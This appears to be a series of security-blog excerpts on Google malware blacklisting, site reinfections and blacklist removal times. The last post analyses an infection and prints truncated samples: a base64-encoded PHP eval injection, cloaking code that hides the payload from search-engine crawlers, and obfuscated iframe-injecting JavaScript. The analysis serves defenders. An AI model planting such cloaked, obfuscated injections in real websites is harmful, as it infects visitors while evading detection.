Protect Your Interwebs!
If you go to a site that is Blacklisted by Google, you will see a new (and prettier) malware warning now if you are using a Mac:
The Website Ahead Contains Malware!
Google Chrome Has Blocked access to site.com for now.
Even if you have visited this site safely in the past, visiting it now may infect your Mac with malware.
Nothing major has changed, but we found this new wording to be more clear for the end user. So good move from the Google/Chrome team.
A few months back I contributed to a post with Smashing Magazine on the top 4 WordPress Infections, it was released yesterday, and it couldn’t have been at a better time. If any one attended WordCamp Las Vegas you might even find some similarities. Fortunately in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.
The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.
**Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.
Read More
We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.
We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:
Read More
If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here
This is an update to our previous post about Google blacklisting. We have some updated numbers to share.
Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?
Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?
To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.
On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.
That’s it. Let us know if you have any questions or comments.
Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!
We were analyzing an infected site today and their Google blacklist diagnostic said the following:
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.
Hum… So Google.com was somehow infected as well? I know it is probably some small sub site from within Google, but I found it interesting that they listed Google’s main domain in there.
If you look at Google’s own diagnostic page, it says:
31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.
Has this site hosted malware?Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.
Let’s see if Google actually blacklists themselves 
We are seeing a big issue on Google for the last few days. Whenever a site got blacklisted, you had the option to request a review after the site was clean. Something like that:
As you saw over the last few days, various sites at GoDaddy were exploited causing lots of complaints on Twitter and in other places about GoDaddy security.
Well, today, many of those sites were reinfected (again) and GoDaddy tried to fix the them automatically. However, their scripts failed for some reason, leaving some sites with empty lines at the top of the PHP files, causing these errors to show up:
Warning: Cannot modify header information – headers already sent by (output started at..
So, if your sites are showing these errors, just run this script:
http://sucuri.net/malware/helpers/clear_php.txt
(right click – save as clear_php.txt, rename to clear.php and upload via FTP to your site. Open your browser and execute it as yoursite.com/clear.php).
That should fix these issues. If you need any help, contact us at http://sucuri.net/support
In the last few days many sites hosted at Network Solution got blacklisted by Google. In all of them the report from Google was:
URL: sitename
Last checked: June 2, 2010
General problem
When Google last tested this page, no content was returned from your server.
Instead, the browser was redirected to a malicious web page. It is likely
that your server configuration has been modified.
On the ones that we manually checked, the sites were clean and malware-free (no redirection). They were all hosted at the IP address 205.178.145.65, and it looks like that their other servers didn’t get affected.
What happened? It seems that either that server got compromised affecting all sites on it or a bug on Google’s malware checker.
If your site got blacklisted and it says on the warning page something along these lines: (and you are hosting at that IP address)
Read More
Google recently published a list with the top 1000 most visited web sites in the world. We found that list very interesting and decided to take a closer look at them.
These are stats we took:
A few of these numbers really amazed us. Nginx, for example, was used in 15% of the sites, very close to IIS with only 17%. Jquery is being used in almost 30% of the top sites and 42% are using Google analytics.
Read More
Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already changing their tactics to hide from Google.
Why is this bad business for the malware writers? Well, if a site gets blacklisted, less users will visit it and less people will load their malware and get infected. Good for everyone else, bad for them.
Anyway, yesterday we were analyzing a malware that added the following code to the index.php of a site:
:< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ? >
After we decode it, we got a code that looked like:
if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&&
(!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”)))
{
return base64_decode(“PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+”);
}
else
{
return “”;
}
So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case. For everyone else they would see the malware javascript:
var bpxDsSbm8=’d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@”*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
*%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r
;eval(bpxDsSbm8.split(‘*%@’).join(“”));
If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.
Want to read more stories like this one? Subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net. With malware? Need help? send us an email.
Comments